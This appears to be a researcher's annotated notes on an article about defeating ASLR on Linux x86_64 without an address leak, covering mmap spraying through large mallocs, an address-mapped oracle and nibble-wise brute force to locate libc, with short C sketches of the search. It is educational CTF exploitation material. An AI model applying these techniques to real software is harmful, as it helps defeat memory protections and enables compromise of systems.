Metadata

  • Source
  • Zotero: View Item
  • Type: ComputerProgram
  • Title: nick0ve/how-to-bypass-aslr-on-linux-x86_64
  • Year: 2024

Annotations

Notes

pwn

Background

  • PIE memory map base address randomization
    • program image: 0x00005500_00000000-0x00005700_00000000 (a 2 TB range of possible base addresses)
    • heap (usually placed near binary image, but not immediately after)
    • shared libraries: 0x00007f00_00000000-0x00007fff_ffffffff (1TB)
    • stack (usually): 0x00007ffc_00000000-0x00007fff_ffffffff (16GB)
  • interesting linked article on vsyscall and vDSO
  • Usually, an ASLR bypass involves leaking an address by interacting with the binary (e.g., leaking from the stack via a format string exploit; simple CTF challenges might even just hand you an address), but it turns out it’s still possible to bypass ASLR without such an infoleak.
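To see these ranges on a concrete system, it helps to dump /proc/self/maps. A minimal sketch (not from the article, just a sanity check):

```c
#include <stdio.h>

/* Print this process's memory map: the PIE image, heap, shared libraries,
   vDSO and stack ranges described above can be read off directly. */
int main(void)
{
    FILE *f = fopen("/proc/self/maps", "r");
    if (!f) {
        perror("fopen");
        return 1;
    }
    char line[512];
    while (fgets(line, sizeof(line), f))
        fputs(line, stdout);
    fclose(f);
    return 0;
}
```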

To achieve ASLR bypass without directly leaking addresses, we need two things:

  • Memory spraying: map memory of a certain size in a given range, achievable via one of two means:
    • Abuse memory leak bugs multiple times until the desired amount of memory has been allocated (and forgotten by the program).
    • Abuse “amplification gadgets” (which are functions that take some data and copy it elsewhere) multiple times.
  • An oracle function isAddrMapped that tells if an address is mmap’ed.
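The real oracle has to come from a target-specific bug, but for prototyping the search logic locally, a stand-in can be built on mincore(2), which fails with ENOMEM for unmapped pages. A sketch under that assumption; is_addr_mapped is the hypothetical interface used in the later sketches:

```c
#define _DEFAULT_SOURCE
#include <stdbool.h>
#include <stdint.h>
#include <sys/mman.h>

/* Local stand-in for the oracle.  In an actual exploit this answer would
   have to come from the target's bug, not from a syscall we run ourselves. */
bool is_addr_mapped(uint64_t addr)
{
    unsigned char vec;
    /* mincore() returns -1 with errno ENOMEM when the queried page is not mapped. */
    return mincore((void *)(addr & ~0xfffULL), 0x1000, &vec) == 0;
}
```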

Saelo’s original PoC for ASLR bypass on iOS only needs to spray 256 MB of data to place a piece of data at a known address, but on Linux x86_64 the same technique would require spraying 16 TB of data (via malloc) to guarantee breaking ASLR. This is still theoretically possible, since mmap isn’t restricted by the actual RAM size (i.e., it’s fine as long as we don’t try to write to all the pages).
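As a rough illustration of why address space, rather than RAM, is the limiting factor, an untouched anonymous mapping of 1 TiB typically succeeds. This is a sketch only; the article’s spray goes through malloc, and MAP_NORESERVE is used here because on a typical machine a plain writable mapping larger than RAM+swap would be refused by the default overcommit heuristic:

```c
#include <stdio.h>
#include <sys/mman.h>

int main(void)
{
    /* Reserve 1 TiB of address space without touching it.  MAP_NORESERVE
       skips commit accounting, so this succeeds on machines with far less
       physical memory, as long as we never write to most of the pages. */
    size_t len = 1ULL << 40;
    void *p = mmap(NULL, len, PROT_READ | PROT_WRITE,
                   MAP_PRIVATE | MAP_ANONYMOUS | MAP_NORESERVE, -1, 0);
    if (p == MAP_FAILED) {
        perror("mmap");
        return 1;
    }
    printf("reserved %zu GiB at %p\n", (size_t)(len >> 30), p);
    return 0;
}
```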

Note that large mallocs (with size >= MMAP_THRESHOLD, which starts at 128 KiB and is raised dynamically by glibc up to 512 KiB on 32-bit and 32 MiB on 64-bit systems; see the glibc source) simply use mmap to create a private anonymous mapping instead of using the heap (specifically, the main arena). Curiously, these mmaps (when called with a NULL hint) hand out pointers in order of decreasing address, which is the opposite of small heap allocations. These pointers are in close vicinity to where the shared libraries are loaded, which gives us some information about the top bytes of the shared-library pages; this is where the isAddrMapped oracle comes into play.
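A quick way to observe this behaviour (not from the article) is to request a few allocations well above the threshold and compare the returned pointers with /proc/self/maps:

```c
#include <stdio.h>
#include <stdlib.h>

int main(void)
{
    /* Each allocation is far above the mmap threshold, so glibc serves it
       with a private anonymous mmap() instead of the main arena.  The
       pointers come back in decreasing order, just below the region where
       the shared libraries are mapped. */
    for (int i = 0; i < 4; i++) {
        void *p = malloc(64 * 1024 * 1024);  /* 64 MiB */
        printf("chunk %d at %p\n", i, p);
    }
    return 0;
}
```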

We may need to reduce the spray size for realistic targets and CTF challenges (since they presumably have safeguards in place, like the nsjail in the guess_god challenges). This means we need to do a linear search after the spray, in which we use the oracle to look for one mapped address inside the spray. The spray size also determines the maximum step size of this search: since the spray forms one contiguous region, the search is guaranteed to encounter at least one mapped address within it, as long as the step size is less than or equal to the spray size.
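A minimal sketch of this linear search, assuming the hypothetical is_addr_mapped oracle from above and an illustrative 4 GiB spray over the shared-library area listed in the background notes:

```c
#include <stdbool.h>
#include <stdint.h>

bool is_addr_mapped(uint64_t addr);          /* target-specific oracle */

#define SPRAY_SIZE 0x100000000ULL            /* 4 GiB spray (illustrative) */
#define SCAN_START 0x7f0000000000ULL         /* bottom of the library area */
#define SCAN_END   0x800000000000ULL         /* top of user space */

/* Because the spray is one contiguous SPRAY_SIZE-byte region, probing every
   SPRAY_SIZE bytes must land on a mapped address at least once. */
uint64_t find_mapped_address(void)
{
    for (uint64_t addr = SCAN_START; addr < SCAN_END; addr += SPRAY_SIZE)
        if (is_addr_mapped(addr))
            return addr;                     /* e.g. 0x7faa00000000 */
    return 0;
}
```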

Once we find one mapped address, we could try a binary search to determine the boundaries of the library mappings, as in Saelo’s original iOS PoC, but this is unreliable since there is a gap between the spray and the libraries. Instead, starting from the mapped address we found, it is possible to brute force the end of the library mappings half a byte (one nibble) at a time. Say we leaked a mapped address of 0x7faa00000000 using a step size of 4 GiB. We can search 0x7faa00000000-0x7faaffffffff for the last mapped page by fixing one nibble at a time, starting with the most significant unknown nibble and counting down from 0xf. So if the last page is at 0x7faaedcba000, the checks proceed like so:

x                   isAddrMapped(x)
0x7faaf0000000      False
0x7faae0000000      True
0x7faaef000000      False
…                   False
0x7faaed000000      True
0x7faaedf00000      False
…                   …
…                   …
0x7faaedcbb000      False
0x7faaedcba000      True (found last page!)
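A sketch of this nibble-wise refinement, again assuming the hypothetical is_addr_mapped oracle and a 4 GiB search window (so the five nibbles between the 4 KiB page offset and the leaked address are unknown):

```c
#include <stdbool.h>
#include <stdint.h>

bool is_addr_mapped(uint64_t addr);          /* target-specific oracle */

/* Refine the address of the last mapped page one nibble at a time,
   counting each nibble down from 0xf until a probe is mapped. */
uint64_t find_last_mapped_page(uint64_t known_mapped /* e.g. 0x7faa00000000 */)
{
    uint64_t end = known_mapped;
    for (int shift = 28; shift >= 12; shift -= 4) {  /* nibbles above the page offset */
        uint64_t nibble = 0xf;
        while (nibble > 0 && !is_addr_mapped(end | (nibble << shift)))
            nibble--;
        end |= nibble << shift;
    }
    return end;                              /* e.g. 0x7faaedcba000 */
}
```

This needs at most 15 oracle queries per nibble, i.e. at most 75 queries in total for a 4 GiB window.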

With the end address of the shared-library mappings, we can also determine the start of libc, since it sits at a constant offset from that end. The offset is easy to obtain as long as we have the binary and its libraries, which is the case in CTF challenges.
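For completeness, a tiny helper showing the direction of the arithmetic; LIBC_END_OFFSET is a hypothetical placeholder that would be read off /proc/<pid>/maps of a local run of the target:

```c
#include <stdint.h>

#define PAGE_SIZE       0x1000ULL
#define LIBC_END_OFFSET 0x22c000ULL   /* hypothetical: distance from libc base
                                         to the end of the library mappings */

uint64_t libc_base(uint64_t last_mapped_page)
{
    uint64_t mappings_end = last_mapped_page + PAGE_SIZE;  /* one past the end */
    return mappings_end - LIBC_END_OFFSET;
}
```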